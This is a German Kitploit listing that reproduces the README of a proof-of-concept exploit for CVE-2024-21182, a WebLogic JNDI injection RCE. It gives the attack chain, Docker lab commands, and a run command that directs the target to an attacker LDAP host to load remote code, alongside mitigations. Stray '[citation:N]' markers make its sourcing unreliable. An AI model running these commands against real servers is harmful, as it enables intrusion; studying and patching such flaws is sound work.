Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE — Proof-of-Concept-Exploit für CVE-2024-21182, eine nicht authentifizierte JNDI-Injection, die zu Remote-Code-Ausführung in Oracle WebLogic Server über T3/IIOP-Protokolle führt. Enthält ein Docker-Labor zum Testen. | Kitploit
Tools/GitHubGitHub/fevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-EntwicklungLabs & Praxis
GitHubfevar54/cve-2024-21182---oracle-weblogic-server-jndi-injection-rce

CVE-2024-21182---Oracle-WebLogic-Server-JNDI-Injection-RCE

Proof-of-Concept-Exploit für CVE-2024-21182, eine nicht authentifizierte JNDI-Injection, die zu Remote-Code-Ausführung in Oracle WebLogic Server über T3/IIOP-Protokolle führt. Enthält ein Docker-Labor zum Testen.

Repository anzeigen
2vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE

CVE-2024-21182 CVSS CISA KEV

📋 Beschreibung

CVE-2024-21182 ist eine nicht authentifizierte JNDI-Injection-Schwachstelle, die die Core-Komponente von Oracle WebLogic Server betrifft. Sie ermöglicht einem entfernten Angreifer über die Protokolle T3 oder IIOP die Ausführung beliebigen Codes (RCE) auf dem Server, wodurch vollständiger Zugriff auf alle Daten des Servers erlangt werden kann[citation:5][citation:8][citation:9].

Dieses Repository enthält einen funktionsfähigen Proof of Concept (PoC), der die erfolgreiche Umgehung des Patches für CVE-2023-21839 mithilfe der Gadget-Kette AggregatableOpaqueReference + MessageDestinationReference demonstriert[citation:2][citation:4].

🚨 Details der Schwachstelle

AttributWert
CVECVE-2024-21182
ProduktOracle WebLogic Server (Core)
Betroffene Versionen12.2.1.4.0 und 14.1.1.0.0[citation:7]
Verfügbarer PatchOracle Critical Patch Update (Juli 2024 und Oktober 2024)[citation:6]
Status in CISA KEVAktive Ausnutzung bestätigt (hinzugefügt am 01/06/2026)[citation:3][citation:8]
Mitigationsfrist (CISA)04/06/2026[citation:8]

Angriffsvektor

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

  • Netzwerk (AV:N): Remote ausnutzbar
  • Niedrige Komplexität (AC:L): Keine besonderen Bedingungen
  • Keine Authentifizierung (PR:N): Anonymer Zugriff
  • Keine Benutzerinteraktion (UI:N): Passive Ausnutzung

⚙️ Angriffsphasen

Phase 1: Aufklärung: Identifizieren von WebLogic-Servern mit exponierten T3/IIOP-Ports (7001).

Phase 2: Analyse: Feststellen, ob der Server eine verwundbare Version (12.2.1.4.0 oder 14.1.1.0.0) ausführt oder ob der Patch vom Oktober 2024 fehlt.

Phase 3: Ausnutzung (technischer Ablauf):

  1. Aufbau des Gadgets: Der Angreifer erstellt ein AggregatableOpaqueReference-Objekt[citation:2].
  2. Referenz-Injektion: Mittels Reflection (Java) wird das private Feld referent des vorherigen Objekts so modifiziert, dass es auf eine bösartige MessageDestinationReference zeigt[citation:4].
  3. Bind und Lookup: Das bösartige Objekt wird im JNDI-Baum des Servers "gebunden" (bind) und anschließend "nachgeschlagen" (lookup).
  4. JNDI-Auflösung: Beim Nachschlagen des Objekts führt der Server eine neue JNDI-Abfrage gegen die vom Angreifer kontrollierte URL (LDAP-Server) aus.
  5. LDAP-Server: Antwortet mit einem Verweis auf einen auf dem HTTP-Server des Angreifers gehosteten Java-Code.
  6. Codeausführung: Der WebLogic-Server lädt die Java-Klasse herunter, instanziiert sie und führt ihren Inhalt im Kontext des Zielsystems aus.

🛠️ Voraussetzungen

  • Docker und Docker Compose: Für die isolierte Testumgebung[citation:2].
  • JDK 8 oder höher: Zum Kompilieren und Ausführen des T3-Clients.
  • WebLogic-T3-Client: wlthint3client.jar (kann aus einer WebLogic-Installation extrahiert werden).

🚀 Verwendung des PoC

Laborumgebung (Docker)

root@kitploit:~
# 1. Clonar el repositorio
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182

# 2. Iniciar el laboratorio (víctima + atacante)
docker-compose up -d

# 3. Ejecutar la explotación automática
./validate.sh

Ausnutzung gegen ein reales (autorisiertes) Ziel

root@kitploit:~
# 1. Iniciar el servidor LDAP/HTTP malicioso
python3 exploit/ldap_server.py

# 2. En otra terminal, ejecutar el payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil

📊 Demonstrierte Auswirkungen

  • Remote-Codeausführung (RCE) auf dem Server
  • Unautorisierter Zugriff auf kritische Anwendungsdaten
  • Vollständige Kompromittierung des Anwendungsservers
  • Potenzielles Einfallstor für laterale Bewegung im Unternehmensnetzwerk
  • Grundlage für die Bereitstellung von Ransomware oder anderen schädlichen Lasten

Aktueller Status laut CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (Aber in der Regel ja, RCEs in Middleware sind ein anfänglicher Vektor bei Ransomware-Intrusionen).

🛡️ Gegenmaßnahmen

  • Sofort patchen: Das Oracle Critical Patch Update vom Oktober 2024 oder neuer einspielen.
  • Netzwerkbeschränkung: Zugriff auf die T3/IIOP-Ports (z. B. 7001) blockieren/einschränken, nur auf vertrauenswürdige Quellen.
  • Überwachung: Ungewöhnliche Bind/Lookup-Versuche im JNDI-Baum erkennen.

⚠️ Rechtlicher Hinweis

Dieser Code dient ausschließlich Bildungs- und Forschungszwecken. Die missbräuchliche Verwendung dieses PoC gegen Systeme ohne ausdrückliche Genehmigung ist illegal. Der Autor übernimmt keine Haftung für den Missbrauch dieser Informationen.

📚 Referenzen

  • NVD - CVE-2024-21182
  • CISA KEV Catalog
  • Oracle Security Advisory
  • Originale technische Analyse

🤝 Danksagungen

  • Original-Forscher, der die Gadget-Kette entdeckt hat
  • dinosn für das reproduzierbare Docker-Labor
Tool herunterladen